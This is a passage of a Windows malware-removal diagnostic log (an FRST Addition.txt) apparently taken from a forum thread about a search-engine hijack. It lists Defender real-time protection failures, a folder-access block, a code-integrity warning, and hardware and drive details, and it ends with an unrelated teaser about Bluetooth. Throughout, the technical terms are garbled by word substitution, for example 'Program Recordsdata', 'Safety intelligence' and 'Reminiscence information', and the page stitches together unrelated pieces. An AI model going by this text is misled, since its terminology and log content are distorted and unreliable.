Product Model: 4.18.2205.7

Date: 2022-07-09 22:35:57
Description:
C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe has been blocked from modifying %userprofilepercentFootage by Managed Folder Entry.
Detection time: 2022-07-10T03:35:57.816Z
Path: %userprofilepercentFootage
Course of Identify: C:Program Recordsdata (x86)MSI AfterburnerMSIAfterburner.exe
Safety intelligence Model: 1.369.867.0
Engine Model: 1.1.19300.2
Product Model: 4.18.2205.7
Occasion[0]:

Date: 2022-07-09 22:09:03
Description:
Microsoft Defender Antivirus Actual-Time Safety function has encountered an error and failed.
Characteristic: On Entry
Error Code: 0x8007043c
Error description: This service can’t be began in Secure Mode
Purpose: Antimalware safety intelligence has stopped functioning for an unknown purpose. In some situations, restarting the service could resolve the issue.

Date: 2022-07-09 20:38:35
Description:
Microsoft Defender Antivirus Actual-Time Safety function has encountered an error and failed.
Characteristic: On Entry
Error Code: 0x8007043c
Error description: This service can’t be began in Secure Mode
Purpose: Antimalware safety intelligence has stopped functioning for an unknown purpose. In some situations, restarting the service could resolve the issue.

Date: 2022-06-26 16:58:01
Description:
Microsoft Defender Antivirus Actual-Time Safety function has encountered an error and failed.
Characteristic: On Entry
Error Code: 0x8007043c
Error description: This service can’t be began in Secure Mode
Purpose: Antimalware safety intelligence has stopped functioning for an unknown purpose. In some situations, restarting the service could resolve the issue.

Date: 2022-06-26 16:56:36
Description:
Microsoft Defender Antivirus has encountered an error making an attempt to load safety intelligence and can try reverting again to a known-good model.
Safety intelligence Tried: Present
Error Code: 0x80070003
Error description: The system can not discover the trail specified.
Safety intelligence model: 0.0.0.0;0.0.0.0
Engine model: 0.0.0.0

CodeIntegrity:
===============
Date: 2022-07-10 00:50:19
Description:
Home windows is unable to confirm the picture integrity of the file DeviceHarddiskVolume6WindowsInstaller{8DB3497D-41AF-423B-9027-D885A28857AB}ARPPRODUCTICON.exe as a result of file hash couldn’t be discovered on the system. A current {hardware} or software program change may need put in a file that’s signed incorrectly or broken, or that could be malicious software program from an unknown supply.

==================== Reminiscence information ===========================

BIOS: American Megatrends Inc. F9 10/15/2019
Motherboard: Gigabyte Expertise Co., Ltd. Z390 GAMING X-CF
Processor: Intel® Core™ i5-9600K CPU @ 3.70GHz
Share of reminiscence in use: 50%
Whole bodily RAM: 16316.64 MB
Accessible bodily RAM: 8086.93 MB
Whole Digital: 20668.64 MB
Accessible Digital: 8723.56 MB

==================== Drives ================================

Drive c: () (Mounted) (Whole:232.26 GB) (Free:78.61 GB) (Mannequin: Samsung SSD 860 EVO 250GB) NTFS
Drive d: (Extra Stuff) (Mounted) (Whole:465.75 GB) (Free:131.37 GB) (Mannequin: Samsung SSD 860 EVO 500GB) NTFS
Drive g: (Stuff) (Mounted) (Whole:465.75 GB) (Free:37.68 GB) (Mannequin: Samsung SSD 860 EVO 500GB) NTFS

?Quantity{b459f679-d9eb-4cca-b158-ea554b982be3} () (Mounted) (Whole:0.52 GB) (Free:0.08 GB) NTFS
?Quantity{fe7ffde5-d3b1-447b-a267-3f6cdd64f72d} () (Mounted) (Whole:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Desk ====================

==========================================================
Disk: 0 (Protecting MBR) (Measurement: 465.8 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 1 (Protecting MBR) (Measurement: 232.9 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 2 (Protecting MBR) (Measurement: 465.8 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Finish of Addition.txt =======================

Edited by Chris Cosgrove, Yesterday, 02:10 AM.

Duplicate deleted.


https://www.bleepingcomputer.com/boards/t/774405/windows10-malware-search-engine-gets-hijacked-and-redirected/

Next Post

Why Bluetooth stays an 'unusually painful' know-how after twenty years

ABI Analysis estimates that 5 billion Bluetooth-enabled gadgets will ship to customers this yr, with that determine anticipated to rise to 7 billion by 2026. Bluetooth is now in every little thing from smartphones to fridges to lightbulbs, permitting a rising variety of merchandise to attach to one another seamlessly […]